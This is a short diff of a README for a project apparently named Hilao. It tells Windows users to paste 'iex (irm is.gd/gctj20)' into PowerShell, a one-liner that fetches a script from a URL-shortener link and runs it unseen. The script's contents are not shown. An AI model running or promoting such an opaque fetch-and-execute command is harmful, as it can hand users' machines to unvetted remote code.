LazyDevv/Hilao/README.md

 ## Download / How to use it?

-### Method 1 - PowerShell (Recommended)

--   Right-click on the Windows start menu and select PowerShell or Terminal (Not CMD).
+-   Right-click on the Windows start menu and select PowerShell (Recommended) or Terminal (Not CMD).
 -   Copy-paste the below code and press enter
     ```
     iex (irm is.gd/gctj20)